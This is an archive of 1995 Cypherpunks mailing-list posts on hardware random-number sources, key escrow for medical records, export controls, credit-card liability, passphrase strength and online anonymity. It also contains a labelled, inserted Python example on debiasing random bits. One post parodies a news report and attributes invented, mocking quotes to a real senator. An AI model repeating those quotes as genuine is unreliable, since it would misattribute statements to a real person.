In-Reply-To: <199511151905.OAA08439@jekyll.piermont.com>
Message-ID: <199511152003.MAA03762@mage.qualcomm.com>

> > And if one is left with only internal noise, why not simply use a nice
> > clean source like a Zener diode?
>
> Quite solidly agreed. Internal noise beats external noise, and there
> is no point in using a radio receiver when what you want is internal
> noise.

It may have been misleading to refer to a radio receiver chip: the noise generated by the chip will be entirely internal. It doesn't depend on any external signal "sneaking in"; the noise comes from the effective resistance of the first amplifier stage. Nothing is being "received", in some sense; it's just a big hunk 'o gain.

A Zener diode would be fine, but the design is a bit more complex, especially for wide bandwidths---you need to mess with biasing voltages, speedy op-amps, interface to CMOS, and all that jazz. You'd need external power (or a DC-DC converter). I wanted a super-simple design that people could just plonk down on a PC board.
Two chips and some bypass capacitors.

Peter

From tms at TIS.COM Wed Nov 15 12:32:34 1995
From: tms at TIS.COM (Thomas M. Swiss)
Date: Thu, 16 Nov 1995 04:32:34 +0800
Subject: MED_vac
In-Reply-To: <199511151823.NAA02794@hidden-foes.gateway.com>
Message-ID: <199511152004.PAA05104@ziggy.tis.com>

John Young writes:
>
> 11-15-95. NYPaper Page One:
>
> "When Patients' Records Are Commodities for Sale."
>
> Individual medical records, carrying more sensitive
> personal information than ever before, are increasingly
> being gathered and stored by the tens of thousands in
> commercial databanks maintained by institutions like
> hospital networks, health maintenance organizations and
> drug companies. And although there is a Federal law that
> protects the privacy of video rental lists, private
> medical information is being bought and sold freely.

A (possibly stupid) thought: could commercial key escrow help here?

I very much want hospitals to have fast access to my medical data if my broken and bleeding body should come through their door, even if I am unconscious and my personal physician cannot be reached. On the other hand, I don't want anyone to be snooping through them right now.

One solution is for me to carry my records around with me on a smartcard or some such device. But there are problems with that approach; for example, do I want that personal information to be in my wallet if it's stolen? Do I want to add another item to the list of physical items I have to keep secure?

So, what if my records were available on the net, but encrypted with a key known to my physician and an escrow agency? (Equivalently, they could be on that smartcard, but encrypted.) If an emergency occurs, the hospital fetches my encrypted records from my physician's server, then sends a message (signed with the hospital's key) to Keys R Us, the escrow agent, saying "This is Dr. McCoy at Frobnitz Memorial Hospital, we need the key for FooBar Medix, Inc., patient number 147258369." (My FooBar Medix, Inc., insurance card lists my physician's server, the escrow agency, and my patient number.) Keys R Us verifies the message and sends the key. Perhaps there's also an alias to notify of the release, one that reports to but is not traceable to my physician or me.

Keys R Us only has a number and a key; they don't know who my physician is and therefore don't know where to find the actual records. Anyone who gets my insurance card can find the records, but has to convince Keys R Us to release the key; and if I've done my homework in picking the agency, they won't.

Does this give an advantage over just having a copy of my records kept by a trusted third party? Maybe so; I think maybe less trust of the escrow agency is necessary. No snooper can slip someone at the escrow agency a couple of cyberbucks to get a copy of my records, unless they've managed to match "FooBar Medix, Inc. patient number 147258369" with "Tom Swiss" and the location of my physician's server. (What if FooBar Medix, Inc., lets this information out? I dunno. I guess I visit their office with a shotgun. Better idea: FMI doesn't know what escrow agency I use. I fill in Keys R Us on the card myself.) No minimum wage slave can just casually browse my records for fun.

Thoughts?

[Since TIS is in the CKE field, I should note that this is my own boneheaded idea, not affiliated with the company in any way.]

-Tom Swiss / tms at tis.com

From cpunk at remail.ecafe.org Wed Nov 15 14:04:18 1995
From: cpunk at remail.ecafe.org (ECafe Anonymous Remailer)
Date: Thu, 16 Nov 1995 06:04:18 +0800
Subject: encryption in BeOS kernel
Message-ID: <199511150526.FAA12374@pangaea.ang.ecafe.org>

This also corresponds to IBM's development of its "IPC" "network appliance" (also due out 1Q '96) to challenge the desktop PC for Internet use. It parallels as well IBM's reported work on a "Microkernal" which may feature encryption, authentication and security hooks.
IBM's IPC will probably use an Intel chip (WSJ today). Which leads to speculation: Would chip-fabbers covertly Fortezza chips to get export ok? Motorola, HP, IBM, others long-linked to USG are ever ready to gobble international market share in the national interest. Intel, sure, world-class fab plants planting chip-secrets. Wonder if that key escrow protest to Gore is a cover for economic actions authorized by National Security D&D?

From jimbell at pacifier.com Wed Nov 15 14:13:15 1995
From: jimbell at pacifier.com (jim bell)
Date: Thu, 16 Nov 1995 06:13:15 +0800
Subject: NSA, ITAR, NCSA and plug-in hooks.
Message-ID:

>jim bell writes:
>>>I think it's 121.1, Category XIII paragraph (b) item (5):
>>>"Ancillary equipment specifically designed or modified for paragraphs (b)
>>>(1), (2), (3), (4) and (5) of this category;"
>>
>>Question: What makes computers in general NOT describable by such a
>>paragraph?!?
>
>The referenced paragraphs describe cryptographic hardware, software and
>technical data. Computers in general are not "specifically designed"
>as cryptographic equipment.

Great! Then you must merely ensure that there is at least one (non-encryption) program around that can use the same hooks.

From rah at shipwright.com Wed Nov 15 14:22:22 1995
From: rah at shipwright.com (Robert A. Hettinga by way of rah@shipwright.com RobertHettinga)
Date: Thu, 16 Nov 1995 06:22:22 +0800
Subject: Size of the internet economy?
Message-ID:

Lately, I heard (somewhere) that $250 million changed hands directly on the net in 1994, mostly credit cards.

Is this a real number? Where did it come from? What are estimates for 1995?

Cheers,
Bob Hettinga

--
Robert Hettinga e$ 44 Farquhar Street Boston 02131 617-958-3971
"Reality is not Optional" -- Thomas Sowell

From jimbell at pacifier.com Wed Nov 15 14:28:27 1995
From: jimbell at pacifier.com (jim bell)
Date: Thu, 16 Nov 1995 06:28:27 +0800
Subject: Hardware-random-bits interface
Message-ID:

>> > And if one is left with only internal noise, why not simply use a nice
>> > clean source like a Zener diode?
>>
>> Quite solidly agreed. Internal noise beats external noise, and there
>> is no point in using a radio receiver when what you want is internal
>> noise.
>
>It may have been misleading to refer to a radio receiver chip: the
>noise generated by the chip will be entirely internal. It doesn't
>depend on any external signal "sneaking in"; the noise comes from
>the effective resistance of the first amplifier stage. Nothing
>is being "received", in some sense; it's just a big hunk 'o gain.
>
>A Zener diode would be fine, but the design is a bit more complex,
>especially for wide bandwidths---you need to mess with biasing
>voltages, speedy op-amps, interface to CMOS, and all that jazz.
>You'd need external power (or a DC-DC converter). I wanted a
>super-simple design that people could just plonk down on a PC
>board. Two chips and some bypass capacitors.

Why not do both? A Zener is supposed to be a relatively high-level source of white noise, up to some upper bandwidth, so you could just feed the Zener voltage (through a blocking cap, if necessary) to the radio receiver input.

See, you and the chip manufacturer are working at crossed purposes: a radio receiver chip is SUPPOSED to be a low-noise device. For your purposes, you WANT it to be a high-noise device, to minimize the significance of external noise. Since the radio receiver chip does some things you want (gain, maybe AGC), but doesn't necessarily add an adequate amount of noise, a zener would be an excellent addition.
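
[Added example, not part of any message in this thread.] The "Hardware-random-bits interface" discussion above mentions two software steps: combining slightly biased bits into fewer, better ones, and XORing the result with an independent pseudorandom stream so that subverting the hardware defeats only one stage. The Python sketch below uses von Neumann's pairing method as one classic debiasing technique (an editorial choice, valid only if the bits are independent); the bit source is simulated, the seed material is constructed, and every function name is illustrative.

```python
"""Post-processing for a biased hardware bit source (added example).

The "hardware" is simulated with a seeded PRNG; nothing here comes from
the posts themselves.
"""
import hashlib
import math
import random


def biased_source(n, p_one, seed=1995):
    """Constructed stand-in for the noise board: n independent bits, P(1)=p_one."""
    rng = random.Random(seed)
    return [1 if rng.random() < p_one else 0 for _ in range(n)]


def fraction_of_ones(bits):
    return sum(bits) / len(bits) if bits else float("nan")


def entropy_per_bit(p_one):
    """Shannon entropy, in bits, of one independent bit with P(1)=p_one."""
    if p_one in (0.0, 1.0):
        return 0.0
    q = 1.0 - p_one
    return -(p_one * math.log2(p_one) + q * math.log2(q))


def von_neumann(bits):
    """Debias independent bits: pair 01 -> 0, pair 10 -> 1, drop 00 and 11."""
    out = []
    for a, b in zip(bits[0::2], bits[1::2]):
        if a != b:
            out.append(a)
    return out


def hash_stream(seed_material, nbits):
    """Deterministic bit stream from SHA-256 in counter mode.

    Stands in for the software stream "derived from keystroke timings";
    it is only as unpredictable as seed_material.
    """
    bits = []
    counter = 0
    while len(bits) < nbits:
        block = hashlib.sha256(seed_material + counter.to_bytes(8, "big")).digest()
        for byte in block:
            for shift in range(7, -1, -1):
                bits.append((byte >> shift) & 1)
        counter += 1
    return bits[:nbits]


def xor_streams(a, b):
    if len(a) != len(b):
        raise ValueError("streams must be the same length")
    return [x ^ y for x, y in zip(a, b)]


def health_check(raw, min_yield=0.10):
    """Flag a stuck or heavily skewed source by its von Neumann yield.

    A fair source yields 0.25 output bits per input bit; a source stuck at
    0 or 1 yields none. min_yield is an assumed threshold.
    """
    return len(von_neumann(raw)) / len(raw) >= min_yield


if __name__ == "__main__":
    raw = biased_source(200_000, p_one=0.60)
    clean = von_neumann(raw)
    print("raw   P(1)=%.4f  entropy/bit=%.4f"
          % (fraction_of_ones(raw), entropy_per_bit(fraction_of_ones(raw))))
    print("clean P(1)=%.4f  bits kept=%d of %d"
          % (fraction_of_ones(clean), len(clean), len(raw)))

    # Failure mode: the hardware stage is stuck at 1 (fault or sabotage).
    stuck = [1] * 100_000
    print("stuck source passes health check:", health_check(stuck))
    # Constructed seed material standing in for keystroke timings.
    soft = hash_stream(b"constructed timings: 113,87,240,95,131", len(stuck))
    mixed = xor_streams(stuck, soft)
    print("stuck XOR software stream P(1)=%.4f" % fraction_of_ones(mixed))
```

With the hardware stage stuck, the XORed output is exactly as strong as the software stream and no stronger, which is why the yield check on the raw bits is worth keeping alongside the XOR.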
From ac at hawk.twinds.com Wed Nov 15 14:48:13 1995
From: ac at hawk.twinds.com (Arley Carter)
Date: Thu, 16 Nov 1995 06:48:13 +0800
Subject: credit card conventional wisdom
In-Reply-To: <199511151924.LAA29261@netcom13.netcom.com>
Message-ID:

On Wed, 15 Nov 1995, Vladimir Z. Nuri wrote:

>
> Arley Carter
>
> >This may be a stupidly obvious question but.....
> >We could argue until the cows come home, hell freezes over or the Cubs win
> >the World Series, what ever comes first ;-) about whether giving your credit
> >card number to a waiter or an 800 # clerk is any more or less secure than
> >transmitting it encrypted or clear text over a data link.
> >
>
> the point of my post was that I AGREE. the only issue is that we should
> make internet security as superior as possible regardless of the security
> of credit cards in the real world. I was attacking the line of thought
> that goes, "credit card security is already marginal, therefore why
> should anyone try to improve it in cyberspace"? this is circular
> reasoning. "why should anyone try to make something more secure when
> it is already insecure?"
>

In my post I am looking at this from an economics point of view. Simply put: If there is unlimited liability to the credit card holder because Mallet is stealing card numbers from the telco switch, encrypted, plain text, it doesn't matter, there will be no users. If there are no users then there will be no transaction fees generated, no transaction fees, then it won't be deployed. Therefore, there is no reason to develop the code or even read the latest and greatest specs. and we are all wasting our time.

We must recognize that no matter what code we write, how secure it is, it won't be used until the banks that must clear the transactions agree to accept the risks of loss in return for their transactions fees. I haven't seen this from any of these consortiums and would like besides publishing their specs for the best system agree that this risk bearing is a necessary step for electronic commerce to become a reality.

I would like to see members of the MasterCard and Visa coalitions comment on this aspect of the systems that are promulgating. The one who cracks this nut first without losing their shirt to Mallet will be the winner. The others that expect us to deploy systems based upon if Mallet breaks the system, the cardholder and or merchant pays are wasting our time. MasterCard/Visa, you're going to have to *earn* those transaction fees in cyberspace.

From the card holder's point of view all he cares about is that he can't lose money from using his card. For anybody else that wants to argue about what is more dangerous, restaurant dumpsters or telco switches, take it to alt.who.the.hell.cares.

Regards:
-arc

Arley Carter
Tradewinds Technologies, Inc.
email: ac at hawk.twinds.com
www: http://www.twinds.com

"Trust me. This is a secure product. I'm from ."

From stewarts at ix.netcom.com Wed Nov 15 14:50:48 1995
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Thu, 16 Nov 1995 06:50:48 +0800
Subject: Repeated Words/characters in Password/Phrase
Message-ID: <199511152225.OAA07177@ix5.ix.netcom.com>

>Do repeated words in a PGP passphrase make the pass phrase less secure than
>a passphrase without any repeated words? And on the same note, do repeated
>letters in a UNIX password make that password easier to break? I can't seem
>to find anything in my books on cryptography that mention this. Thanks.

As always, it depends on the attacks people can make on your system.

For Unix password files, the cyphertext is often available, the plaintext is known, and the key (your password) is known to be eight or fewer characters. If there's reasonable suspicion that your password contains multiples of one or more characters, and that they're mostly letters, you're toast against a good brute-force attack, because the search space is fairly small. Using, say, a pair of 4-letter words is an even worse idea...

For PGP passphrases, the cyphertext is generally unavailable, but assuming you're dealing with Bad Guys resourceful enough to try to crack your passphrase, they've probably got the file. The plaintext may be partially known (PGP data files have some structure; RTFM to find out how much) and partially unknown (your secret key) but guesses can be validated (slowly). The structure of the IDEA key is that your passphrase is hashed by MD5, and the 128-bit output used as an IDEA key to encrypt the formatted secret key. Since brute-forcing IDEA with the 128-bit MD5 output is unrealistic, the alternative is to feed candidate keys through the whole process. So how much entropy does your passphrase have, and how many guesses are they willing to attempt? How much does word-repeating affect it?

How much entropy depends on your taste in passphrases, your creativity, and how much you're willing/able to memorize without resorting to writing it down. The MD5 effectively limits entropy to 128 bits, but you can cram as much as you want into the passphrase and MD5 will crunch it all down, so repeated words can only cause problems if they make you decide you've got enough entropy in the passphrase before you do. If your passphrase is "FOO BAR", and you're known to be a programmer, lengthening it to "FOO FOO BAR BAR BAR Skidoo" may improve it some, though it's not as good as "Eric Woodruff Kintetsu Espada 1145 Lutheran", to pick six words drawn randomly from the Tri-Valley phone book. But if you eliminate obvious material, and word-doubling lets you pick a more complex passphrase than you might have otherwise used, go ahead - it's not going to make the MD5 any more attackable.

#--
# Thanks; Bill
# Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281

From stewarts at ix.netcom.com Wed Nov 15 14:51:35 1995
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Thu, 16 Nov 1995 06:51:35 +0800
Subject: NSA, ITAR, NCSA and plug-in hooks.
Message-ID: <199511152225.OAA07154@ix5.ix.netcom.com>

>>Does anyone know the ostensible justification for this?

Isn't the NCSA government-funded? If so, they've probably got less slack in what they can get away with than private citizens; the NSA's got more leverage over their funding, especially if "Supercomputer Applications" are often military or civilian-govt. Not only do they have to worry about ITAR as law, they have to worry about their continued cash flow.

#--
# Thanks; Bill
# Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281

From s1113645 at tesla.cc.uottawa.ca Wed Nov 15 14:55:49 1995
From: s1113645 at tesla.cc.uottawa.ca (s1113645 at tesla.cc.uottawa.ca)
Date: Thu, 16 Nov 1995 06:55:49 +0800
Subject: BBS Generator Code Needed & crypto++
In-Reply-To: <9511141749.AA28423@zip_master2.sbi.com>
Message-ID:

On Tue, 14 Nov 1995, David Macfarlane wrote:

> Wei Dai's crypto++ has BBS, if you can find a copy.

Try: (quoting Wei Dai)

ftp://ftp.csn.net/mpj/I_will_not_export/crypto_?????/libraries/crypto11.zip
where ????? is in ftp://ftp.csn.net/mpj/README

I encourage people to use this library in commercial as well as shareware/freeware products. You don't have to pay me a cent, but don't forget about the patents.

From pcassidy at world.std.com Wed Nov 15 15:57:25 1995
From: pcassidy at world.std.com (Peter F Cassidy)
Date: Thu, 16 Nov 1995 07:57:25 +0800
Subject: Size of the internet economy?
In-Reply-To:
Message-ID:

On Wed, 15 Nov 1995, Robert A.
Hettinga wrote:

> Lately, I heard (somewhere) that $250 million changed hands directly on
> the net in 1994, mostly credit cards.
>
> Is this a real number? Where did it come from? What are estimates for 1995?
>

Everything on the net is outside of a lot of traditional metrics and hard to authenticate even if it were simple to measure. Forrester cites 250 million retail and $90 million in content revenues. By contrast, guys selling a piece of pipe raked in $1.5 billion.

Activmedia - www.activmedia.com - does regular surveys. I just got a breathless press release for their latest one - "WEB COMMERCE UP 1900%." Someone must have bought tickets to the latest George Forman comeback fight or something from a ticketron on-line kiosk. . .

Ole,
Peter

>
>

From anonymous-remailer at shell.portal.com Wed Nov 15 16:41:23 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Thu, 16 Nov 1995 08:41:23 +0800
Subject: CSE gets flak on TV
Message-ID: <199511160021.QAA06782@jobe.shell.portal.com>

On Tue, 14 Nov 1995, Mark C. Henderson wrote:

> On Nov 14, 16:47, s1113645 at tesla.cc.uottawa.ca wrote:
>> Subject: CSE gets flak on TV
>> For those who care, the Communications Security Establishment has been
>> getting some flak for spying on Mex. during NAFTA talks and on Korea to
>> help us sell Can. nuke reactors:

The CSE deserves all the flak that it can get ... especially the village idjit in "LMN Group", Barry de 'Artful. Gee is he full of it. His phone manners are atrocious, especially for someone *supposedly* in customer relations.

I mean are these guys on their toes, or what?? I guess he was just trying to do a bad Lily Tomlin impression, or they're having a really bad day over there. My mistake for demonstrating a willingness to talk. It really was a waste of a quarter.

I guess that I'm not supposed to taunt the poor people at the CSE via STU-III. I guess I should have used POTS. I mean Motorola's STU-III can't be spoofed, can it?? Especially when we go into SECURE MODE?? (btw, that's STRIKE THREE to my Ottawa friends ...)

> Folks who are interested in the CSE should also check out the
> "unofficial CSE home page" at

Hmm, I think they misspelled some stuff on this page. It's STU-III ... not STY-III ... guess someone's finger slipped up on the Y and the U, or something.

Then again, maybe we should be specing Alcatel over Motorola. Fewer chances for miscommunications. Or maybe Motorola has a couple of new products coming out. I'll bet whatever they are, they ain't Marrons Glaces, or Beaujolais Villages.

Alice de 'nonymous ...

...just another one of those...
...hunters...

P.S. This post is in the public domain.

C. S. U. M. O. C. L. U. N. E.

From Greg_Rose at sibelius.sydney.sterling.com Wed Nov 15 17:05:50 1995
From: Greg_Rose at sibelius.sydney.sterling.com (Greg ROSE)
Date: Thu, 16 Nov 1995 09:05:50 +0800
Subject: credit card conventional wisdom
In-Reply-To: <9511151659.AA03934@zorch.w3.org>
Message-ID: <9511160031.AA41675@paganini.sydney.sterling.com>

>No. What Phil is saying is that the magnetic strip contains an extra
>group of digits which are only available when the stripe is read, and not
>when the card is used for CNP.

The extra digits I was referring to are the ones on the front of the card but not embossed.

Wow, you learn something every day. I've never in my whole life (well, my American Express life, over 15 years) noticed those four digits. I've never been asked for them by anyone, or noticed them being written down, either. Exactly when and how are they used?

Greg.

Greg Rose               INTERNET: greg_rose at sydney.sterling.com
Sterling Software       VOICE: +61-2-9975 4777 FAX: +61-2-9975 2921
28 Rodborough Rd.       http://www.sydney.sterling.com:8080/~ggr
French's Forest         35 0A 79 7D 5E 21 8D 47 E3 53 75 66 AC FB D9 45
NSW 2086 Australia.     co-mod sci.crypt.research, USENIX Director.

From cassiel at alpha.c2.org Wed Nov 15 17:08:43 1995
From: cassiel at alpha.c2.org (Cassiel)
Date: Thu, 16 Nov 1995 09:08:43 +0800
Subject: No Subject
Message-ID: <199511160025.QAA08644@infinity.c2.org>

Thanks for all who wrote with help re: FAQ file! I now have several other sources from which to download the file. Looks pretty interesting....

Cassiel

From foodie at netcom.com Wed Nov 15 17:16:09 1995
From: foodie at netcom.com (foodie at netcom.com)
Date: Thu, 16 Nov 1995 09:16:09 +0800
Subject: Repeated Words/characters in Password/Phrase
Message-ID:

>In the real world, where passphrases must be memorized, "long and random"
>is an elusive goal, which has to be weighed against the risk of other
                        ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
>attacks (such as capturing keystrokes with a software monitor, or from afar
 ^^^^^^^
>with a van Eyk antenna, etc.).
>
>Me, I use a nonsense phrase which has meaning to me, with a few garbage
>characters added to confuse things further. I don't think my passphrase is
>the weak link.
>
>- --Tim May

This is, of course, very good advice. Passphrases need only be as strong as every other component of the security system.

I'd add that there is a moderately good reason to keep the passphrase _only_ as strong as every other component of the system for psychological reasons. The passphrase is what the user tends to think of when they think of their system. Even if that user is the designer of the system, a false sense of security can be an easy thing to develop. At a past place-of-work, someone there who prided themselves on using difficult passphrases was bitten pretty severely by a faulty .forward file.
DES provides similar lessons - searching 56 bits of keyspace requires just barely less effort than that required to launch other attacks on the algorithm (in theory, at least). The system is, as far as anybody knows, secure, and no part of it is significantly more secure than any other. -j -- On the internet, nobody knows you're a diety. _________________________________________________________________ Jamie Lawrence From jya at pipeline.com Thu Nov 16 09:20:45 1995 From: jya at pipeline.com (John Young) Date: Thu, 16 Nov 95 09:20:45 PST Subject: NID_otp Message-ID: <199511161720.MAA17416@pipe3.nyc.pipeline.com> 11-16-95. Washrag: "Pentagon Gaining Turf From the CIA." Pentagon agencies and officials are set to play a greater role than before in supervising key intelligence operations including doctoring spy satellite photos, and recruiting then ignoring bumbling agents overseas. There's even a proposal in Congress to create a new, national intelligence director hiding out in the Office of the President (OTP), and supervising nulls with equal job-fears at the CIA and Pentagon. Sen. Bob Kerrey worries about the trend because "in the world of the future, more and more secret garbage would not feed my national interest." He cited Deutch's proposed consolidation of intelligence imagery analysis in a new Pentagon-run advert agency, which would swallow up the CIA's National Photo Interpretation Center along with the Defense Department-based Central Exaggeration Office and Defense Entrapping Agency. "Clinton, Moynihan and Specter are hogs for slop," Kerrey spat, "I want my rep fattened." NID_otp (8 kb) From cassiel at alpha.c2.org Wed Nov 15 17:53:17 1995 From: cassiel at alpha.c2.org (Cassiel) Date: Thu, 16 Nov 1995 09:53:17 +0800 Subject: No Subject Message-ID: <199511160125.RAA02384@infinity.c2.org> Hi All You were all so helpful with my last request, I figured I would go for broke and ask for more advice. 
The physical security of my computer isn't really that great, so I've been interested in finding utilities that would securely delete the files I want deleted (as well as temp files created, etc.). I run Win 3.1 on DOS 6. What do people think is the best free/shareware file wiping utility (now, there's a Freudian name...) out there? How about for deleting that pesky Windows Swapfile? I know--best of all worlds I remain in DOS, but this isn't always practical. Any advice would be appreciated. Please cc me directly in your response as I've moved over to Cypherpunk-lite. Thanks again! Cassiel From hfinney at shell.portal.com Wed Nov 15 18:07:03 1995 From: hfinney at shell.portal.com (Hal) Date: Thu, 16 Nov 1995 10:07:03 +0800 Subject: Anonymity and Intellectual Capital Message-ID: <199511160148.RAA18908@jobe.shell.portal.com> Here is a draft article by David Post of Georgetown Law Center. He offered it on the Cyberia list and it includes permission to redistribute. I thought it had some interesting ideas on anonymity and pseudonymity, as well as our old bugaboo "reputation capital". I have reformatted it slightly to improve readability but made no changes to the content: Pooling Intellectual Capital: Anonymity, Pseudonymity, and Contingent Identity in Cyberspace DRAFT OUTLINE October 31, 1995 David G. Post [NOTE 1] Most discussions of "anonymity" in cyberspace focus on whether or not to regulate the availability of "untraceably anonymous" messaging functions -- anonymous remailer services and the like -- and the related question of how, in the special circumstances of cyberspace, one might accomplish such regulation.
To be sure, this is an important perspective; although we are embedded in a world in which anonymous transactions are pervasive, we have never before been able to manipulate anonymity, or to undertake as wide a range of anonymous transactions, as cyberspace allows us to undertake (and we have, therefore, only begun to think about the implications of being able to do so). At the same time, however, the technology offers, it would seem, new prospects for eliminating anonymous communication, i.e., for requiring (and enforcing the requirement for) completely "traceable" communication. We need, in the first instance, to understand more about the costs and benefits of anonymity in this new environment before we can sensibly talk about the best way to regulate it (or whether to regulate it at all). Harms associated with an anonymous messaging regime include, notably, the inability of "law enforcement" (broadly defined to include both public and private enforcement) to obtain information on persons responsible for harm perpetrated by individual actors; benefits include the ability of individuals to engage in communicative activity without putting any aspects of their "identity" at risk (see below for additional discussion of the reasons for the quotation marks here). My thesis here is that, because of the close links between anonymity and pseudonymity in cyberspace, new elements need to be added to this equation -- primarily on the benefits side. This requires disentangling, at the outset, three related concepts: anonymity, pseudonymity, and traceability. 
We can define an "anonymous" communication as one in which the message itself contains (and hence the recipient of the message receives) no information regarding the identity of the sender.[NOTE 2] Although there can be truly anonymous messages even in this strict sense -- messages containing no information about the originator -- it makes more sense to talk about anonymity as a continuous rather than a binary attribute (present/absent) of messages: even messages we ordinarily think of as "anonymous," after all, contain some information about the author (e.g., graffiti scrawled on a subway platform informs us that the author was literate, and was geographically located in a certain place within the last x months/years, all of which probably effects a significant reduction in the reader's uncertainty about the identity of the author by ruling out the vast majority of individuals in the world as possible authors). Messages, however, rarely contain a fixed amount of information about the sender's identity; [NOTE 3] the degree to which a message may be considered "anonymous" is rarely (if ever) an inherent characteristic of the message itself. Relevant information about the originator's identity may well often be available, but only at some additional cost. For example, an "anonymous" note slipped under the door may be covered with fingerprints from which, were we able easily to access both a fingerprint reader and the FBI's fingerprint database, we could obtain significant information about likely originators.
"Traceability" measures the cost of obtaining information about the identity of the sender in addition to the information that is "readily apparent" -- i.e., obtainable at (virtually) no cost -- from the message itself.[NOTE 4] Finally, we can define a pseudonymous message as one that contains information (of varying reliability, to be sure) about the identity of the originator -- the cognizable entity responsible for transmitting the message -- without simultaneously providing information about the actual, biological, individuals responsible for transmission of the message. Pseudonymity, like anonymity, shields aspects of the identity of the "real" actor from view; information that a book was written by "Mark Twain" by itself gives you no more (or less) information about the true identity of the author than does the information that it was written by "Anon." Indeed, if Samuel Clemens had chosen to publish each of his novels under a different pseudonym, that would have been the essential equivalent of publishing all of the novels under the pseudonym "Anon.," or "John Doe." Pseudonymity allows each message to carry additional information, cumulative over time, about the pseudonymous actor; i.e., the difference between pseudonymity and anonymity is that the former, but not the latter, allows the accumulation of reputational capital in the pseudonymous entity. The use of a single pseudonym "Mark Twain" allowed Clemens to invest a single entity with reputational capital, built up over time and across different novels; "Anon."
will not serve that purpose, primarily (if not exclusively) because it is unprotected and used by any number of other authors (many of whom might not be quite as talented as Clemens).[NOTE 5] In other words, pseudonymity, like anonymity, allows individuals to act without putting at risk any aspects of their own, personal identity (including their physical assets, reputational capital, financial capital, and the like); pseudonymity differs, however, from anonymity in that it allows the accumulation of reputational capital in the pseudonymous entity. Both anonymity and pseudonymity are thus forms of "limited liability," and the extent to which they serve that function effectively is determined, in both cases, by whatever traceability requirements are imposed. To illustrate, take the extreme case, e.g., a requirement that all messages contain certain information about specified aspects of the originator's "identity." This would not only eliminate anonymous messages (at least to the extent it could be enforced), but it would make certain forms of pseudonymity effectively unavailable as well; the reputational capital belonging to "Mark Twain" and to "Samuel Clemens" would be identical, and whatever aspects of Clemens' identity had to be revealed would no longer be shielded in the course of any transactions in which "Mark Twain" was involved. Most discussions of "the regulation of anonymity in cyberspace" are really discussions about traceability requirements. The potential benefits and harms that accompany an anonymous messaging regime are directly related not to the availability of "anonymity" per se, but to the availability of untraceable anonymity. 
I know of no serious proposals, for example, to prohibit individuals from leaving their electronic mail messages unsigned; the hard questions all concern the nature of the traceability requirements that will be put in place in regard to those messages, i.e., how easy or difficult will it be for the recipients of such messages, third parties, or law enforcement officials, to obtain additional information about the identity of the message originator. But traceability requirements will have an impact -- possibly a profound impact -- not merely on the availability of anonymous communication, but on the availability of pseudonymous communication as well. For example, a sufficiently high degree of traceability eliminates both anonymous and pseudonymous messages; requiring all authors to provide information about their "real" identity not only makes it impossible for them to communicate anonymously, it is, in effect, impossible for them to communicate pseudonymously as well. Analyzing the consequences of a "ban on anonymity" in cyberspace needs to take more than the benefits and costs of anonymous messaging into account; it needs to be evaluated in light of the benefits and costs of pseudonymous communication as well, considerations that have received less attention from those looking at these questions. So the question "what is the best traceability requirement to apply to electronic communication" needs to consider not only the harms and benefits flowing from anonymous communication but these additional considerations as well. Because all communication in cyberspace is entirely machine-mediated -- i.e., because the "identity" of the relevant actors in a biological sense is necessarily at one remove from the communication itself -- everyone acts "pseudonymously," at least in the sense that you can only be identified by a stream of bits when you act in cyberspace [NOTE 6]. 
The prospect for more creative uses of pseudonymous action -- the ability for individuals to pool their individual intellectual capital with great flexibility and with very low start-up or transactions costs, into a wide range of new kinds of actors and entities, each capable of accumulating reputational capital -- is a profound and exciting feature of this environment.[NOTE 7] The "limited liability" metaphor now becomes a bit more useful. Just as limited liability in the corporate context was designed to encourage the pooling of physical and financial assets into corporate entities, assuring investors that their personal assets would not be placed at risk, so, too, should protection against traceability (i.e., protection for pseudonymous action) encourage "investors" to pool their intellectual capital into pseudonymous entities, assuring those investors that only the reputation of the pseudonymous actor, and not their own personal assets, are at risk when the entity acts. This approach probably answers none of the hard questions about the proper scope of regulation; it may, hopefully, lead to a consideration of those questions that need to be answered before any regulatory actions are undertaken. If there are benefits to be gained from the actions of these entities -- if the pooling of intellectual capital into entities leads to new and valuable forms of intellectual undertakings (itself a question open to discussion) -- we should seek to design our rules of limited liability to simultaneously induce "investors" to form these new entities while minimizing the costs that may be associated with their formation? Analyses of corporate limited liability are useful analogues for this inquiry; when should "piercing the veil" of pseudonymity be permitted or required? Can we disaggregate the various aspects of personal identity that should receive more, or less, protection from disclosure? ************************************************ NOTES. 1. 
Visiting Associate Professor of Law, Georgetown University Law Center, and Co-director, Cyberspace Law Institute. Email: Postd at law.georgetown.edu or DPostn00 at counsel.com. Permission is hereby granted to freely copy and distribute this paper; please retain the "Draft" designation as well as attribution to the author. 2. I use "information" in the information-theoretic sense, in which information is measured as a reduction in uncertainty; that is, a message that contains information about the identity of the sender is one that, by definition, lowers the recipient's uncertainty concerning the identity of the sender. 3. "Identity," of course, is not a static, context-less piece of information, but is, rather, a complex cluster of characteristics attributable to an individual, subsets of which may be more or less relevant in particular contexts (and information about which may be differentially transmitted in particular messages). Consider the graffiti again -- even assuming that this may be an "untraceable" message, in what sense is it an "anonymous" one? The reader may obtain a great deal of information relevant to (certain aspects of) the originator's "identity" -- information about the originator's political views, perhaps, or familiarity with certain historical events. On the other hand, the original message provides no information (i.e., it is "anonymous") with regard to the originator's state of domicile (or where the originator went to school, or how many children the originator may have -- all attributes relevant, in other contexts, to the question of the originator's "identity"). And while we ordinarily think of "identity" in the context of individual biological persons, that is far too restrictive a view. Consider my receipt of an (unsigned) notice from the Department of Motor Vehicles, or an (unsigned) advertising flyer from my local McDonald's restaurant. 
